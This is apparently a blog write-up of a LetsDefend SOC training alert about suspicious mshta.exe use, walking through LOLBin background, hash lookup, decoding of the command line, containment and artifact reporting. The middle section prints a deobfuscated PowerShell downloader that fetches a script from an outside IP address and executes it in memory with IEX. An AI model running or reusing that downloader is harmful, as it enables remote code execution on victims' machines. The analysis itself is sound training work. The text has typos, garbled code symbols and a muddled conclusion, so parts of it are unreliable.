SOC164 Suspicious Mshta Behavior | LestDefend Cyberexersice
Today we’re going to investigate a lestDefent’s alert, trying to response the correct format.
Level: Security Operations
Type: LOlbin
EventID: 114
Tools: AbuseIP, VirusTotal.
What are Living-off-the-land binaries (LOLBins)?
A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.
(definition: talosintelligence.com)
Virus Total
I research in virus total using the MD5 hash by lest defend and I can get this.
Press enter or click to view image in full size
Determine Suspicious Activity
In this web you can research a lolbin an try to get information about it.
https://lolbas-project.github.io/lolbas/Binaries/Mshta/#execute
Press enter or click to view image in full size
Press enter or click to view image in full size
Press enter or click to view image in full size
For responde this or research you need to go to endpoint security and filter por the IP in this case is 172.16.17.38. This is the Roberto’s computer. now you need to looking for the bynary calls ms mshat.exe and get the content of the cmdline in my case a found this content
Press enter or click to view image in full size
Press enter or click to view image in full size
This script is a PowerShell downloader (typical of malware) obfuscated with hexadecimal. It does the following:
It defines a function HI($i) that converts hexadecimal text to ASCII (for example, “446F776E” → “Down”).
It creates a Net.WebClient object.
It dynamically constructs the name of the DownloadString method using hexadecimal:
446F776E → Down
6C6F → lo
616473747269 → adstri
6E67 → ng
=> Down + lo + adstri + ng = DownloadString
It executes this:
It downloads http://193.142.58.23/Server.txt
Then it executes it in memory using IEX (Invoke Expression).
“Unobfuscated” version (what it actually does)
function HI(\(i){
\)r=’’
for(\(n=0; \)n -lt $i.Length; $n+=2){
\(r += [char][int](“0x”+\)i.Substring(\(n,2))
}
return \)r
}
\(wc = New-Object Net.WebClient
\)code = \(wc.DownloadString(“http://193.142.58.23/Server.txt")
IEX \)code
What Is Supicious Activity
Press enter or click to view image in full size
Answer Execute:
Since if you can saw the before analize you can get the adversary use the ttp call System Binary Proxy Execution: Mshta for obtain more information go to mitre and lolbin:
Mshta on LOLBAS
Mshta.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page…
System Binary Proxy Execution: Mshta
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted…
ID T1218.005
Press enter or click to view image in full size
I put Malware.
Correct: Users
Press enter or click to view image in full size
Go to Enpoint security and press Containment.
Containment is isolate the end device of the network for avoid communication between them.
Press enter or click to view image in full size
Add Artifacts
Press enter or click to view image in full size
MD5: 6685c433705f558c5535789234db0e5
iP: (“http://193.142.58.23/Server.txt")
aAnalysist Note
Press enter or click to view image in full size
I had a mistake beacuse I put the activity was performed for the malware that is wrong since if you can see the command line that command put on cmd are normal, If a malware try to do commands those commands were more complex.
Like the obfuscation command but my mistake can help you for learn about it, if you want to work in soc analysist you need to get strongs knowledge abut this process and this type of analize
Press enter or click to view image in full size
